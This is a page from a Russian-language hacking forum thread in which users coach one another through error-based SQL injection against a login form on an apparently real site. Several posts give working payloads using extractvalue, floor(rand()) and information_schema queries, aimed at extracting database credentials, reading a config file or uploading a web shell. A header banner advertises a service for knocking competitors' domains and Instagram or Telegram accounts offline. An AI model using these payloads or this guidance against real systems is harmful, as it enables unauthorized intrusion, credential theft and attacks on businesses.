УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2279 из 2438

2279

Опции темы

Поиск в этой теме

Опции просмотра

#22781

03.10.2013, 19:56

Inoms

Guest

Сообщений: n/a

Провел на форуме:
23349

Репутация: 45

Если на \, реагирует то весь участков, вплоть до пароля можно выставить как логин.

login=admin\&password= or extractvalue(1,concat(0x3b, user())) -- t

#22782

03.10.2013, 19:58

zombak18

Guest

Сообщений: n/a

Провел на форуме:
12404

Репутация: 0

Цитата:

Сообщение от Inoms

Inoms said:
Если на \, реагирует то весь участков, вплоть до пароля можно выставить как логин.
login=admin\&password= or extractvalue(1,concat(0x3b, user())) -- t

уже ближе..

что то еще нужно(

#22783

03.10.2013, 20:05

Inoms

Guest

Сообщений: n/a

Провел на форуме:
23349

Репутация: 45

Если и прокатит, то можно с юнионом поиграться, если нет -

login=admin\&password= or(select 11 from information_schema.tables group by concat(user(),0x3b,version(),floor(rand(0)*2)) having count(*)) -- t

#22784

03.10.2013, 20:08

zombak18

Guest

Сообщений: n/a

Провел на форуме:
12404

Репутация: 0

Цитата:

Сообщение от Inoms

Inoms said:
Если и прокатит, то можно с юнионом поиграться, если нет -
login=admin\&password= or(select 11 from information_schema.tables group by concat(user(),0x3b,version(),floor(rand(0)*2)) having count(*)) -- t

Другая ошибка, но что то не хочет тоже

#22785

03.10.2013, 20:10

Melfis

Guest

Сообщений: n/a

Провел на форуме:
195266

Репутация: 53

Цитата:

Сообщение от zombak18

zombak18 said:
уже ближе..
что то еще нужно(

Так вот ты через ошибку вывел нужный тебе результат то: root@192.168.8.64

#22786

03.10.2013, 20:13

zombak18

Guest

Сообщений: n/a

Провел на форуме:
12404

Репутация: 0

Цитата:

Сообщение от Melfis

Melfis said:
Так вот ты через ошибку вывел нужный тебе результат то:
root@192.168.8.64

Зачем мне логин и айпи с локалхоста)

Нужно либо получить название/пароли из бд

либо конфиг с php файла на самом сайте

#22787

03.10.2013, 20:32

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от zombak18

zombak18 said:
Зачем мне логин и айпи с локалхоста)
Нужно либо получить название/пароли из бд
либо конфиг с php файла на самом сайте

За тем,что все у вас на виду!

Пробуйте:

Цитата:

Сообщение от None

select+count(*),concat((select +table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x

#22788

03.10.2013, 20:33

zombak18

Guest

Сообщений: n/a

Провел на форуме:
12404

Репутация: 0

Цитата:

Сообщение от YaBtr

YaBtr said:
За тем,что все у вас на виду!
Пробуйте:

неа(

ах да либо запрос на загрузку шелла тоже вариант)

#22789

03.10.2013, 20:39

Melfis

Guest

Сообщений: n/a

Провел на форуме:
195266

Репутация: 53

Цитата:

Сообщение от zombak18

Потому что ты неправильно используешь error base sqlinj

http://clip.corp.mail.ru/clip/m517/1380812270-clip-20kb-fvNTIqJO3gz2.png

Вот ты использовал и выбрал user(), под которым скрипт получает доступ в базу, тебе он и отобразился. Причём юзер рутовый. Вместо user() и подставляй свои операции по выборке из базы.

Цитата:

Сообщение от zombak18

zombak18 said:

неа(
ах да либо запрос на загрузку шелла тоже вариант)

Не вариант, потому что чтобы прогрузить шелл - надо чтобы кавычки не фильтровались. Ты хотя бы читай и анализируй что ты делаешь. В примере, что тебе дали у тебя стоит после select +, который не преобразовался в пробел, замени его.

#22790

03.10.2013, 20:49

zombak18

Guest

Сообщений: n/a

Провел на форуме:
12404

Репутация: 0

Цитата:

Сообщение от Melfis

Melfis said:
Потому что ты неправильно используешь error base sqlinj
http://clip.corp.mail.ru/clip/m517/1380812270-clip-20kb-fvNTIqJO3gz2.png
Вот ты использовал и выбрал user(), под которым скрипт получает доступ в базу, тебе он и отобразился. Причём юзер рутовый. Вместо user() и подставляй свои операции по выборке из базы.
Не вариант, потому что чтобы прогрузить шелл - надо чтобы кавычки не фильтровались. Ты хотя бы читай и анализируй что ты делаешь. В примере, что тебе дали у тебя стоит после select
+
, который не преобразовался в пробел, замени его.

Эх да ' фильтрует(

Да с пробелом и без пробовал.. всё равно та же ошибка

http://clip.corp.mail.ru/clip/m517/1380815456-clip-22kb-sVmu65bUCDSD.png

/название бд достал card

Страница 2279 из 2438

2279

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)

Быстрый переход